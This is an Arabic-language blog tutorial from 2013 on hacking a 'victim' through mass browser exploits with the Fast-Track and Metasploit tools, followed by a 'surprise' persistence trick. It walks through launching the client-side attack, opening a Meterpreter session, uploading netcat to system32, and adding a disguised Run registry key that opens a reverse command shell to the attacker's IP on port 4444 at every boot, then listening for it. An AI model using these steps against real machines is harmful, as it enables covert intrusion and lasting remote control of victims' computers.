حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة M3tasploit , Fast-track 2013


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته ..

وشلونكم ؟

ندخل في صلب الموضوع ..

طبعا المكتوب واضح من عنوانه ..

راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side


باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي ..

طيب ندخل على التيرمنال .. بوضعية الجذر

و نكتب الامر لدخول مجلد الفاست تراك


كود:
cd/pentest/exploits/fasttrack

لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون ..

طيب نشغله بالامر ..


كود:
./fast-track.py -i

-i تعني تشغيل السكربت داخل التيرمنال ..

الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد

هجومنا المطلوب اسمه Mass Client-Side Attack و رقمه 4 .. يعني نحدده بالرقم 4

من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا )

من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل Meterpreter لان راح نستخدمه بعد شوي لسهولته ..

ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا ..

الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر ..

ننتظر الى ان تنتهي .. بكملة Server started

بامكانك عمل سبوفينج بالسيرفر .. ( شارحها في مواضيع سابقة بالتفصيل )

عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة ..

ندخل لها بالامر


كود:
sessions -i 1
1 يعني رقم الجلسة ..

الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل


================================================== =========


دور المفاجئة :-

المفاجئة يا طويل العمر هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل ..

اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية ..


كود:
upload /tmp/nc***** C:\\windows\\system32\\nc*****
الان ندخل على موجه الاوامر تبع الضحية ..

كود:
execute -c -H -f cmd***** -i
وش السواة الحين ؟

امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd***** 192.168.1.3 4444

مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر ..

و هذا هو الامر كامل


كود:
reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/
reg add : واضح .. امر بدائي لاضافة اي مفتاح
hklm : و تعني مجلد HKEY_LOCAL_MACHINE
/v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile
/t : و تعني نوع المفتاح و في الاغلب يكون reg_sz
/d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd***** 192.168.1.3 4444

الان و بعد زرع المفتاح ..

نروح للتيرمنال و ونتنصت على البورت 4444 ..


كود:
nc -vlp  4444

و الضحية راح يشبك معك يوميا ..

================================================== =========

لمشاهدة التطبيق على اليوتيوب




و لعيونكم الشرح من نوع HD بوضوح 6 ميجا بايت .. عشان لا احد يزعل و يقول الشرح مهوب واضح :D


لتحميل الشرح بدون اي تعديلات و باعلى جودة ..

http://www.2shared.com/file/7605015/.../Dr.LiNuX.html

تعليقات

المشاركات الشائعة من هذه المدونة

بحث مرتقب بخصوص علم البيانات الضخمة Big Data وتحليلها - تدوينة للإعداد

توضيحات بخصوص اساليب التخفي - The Onion Router

أسئلة شائعة حول إضافة Mailvelope والإجابة عليها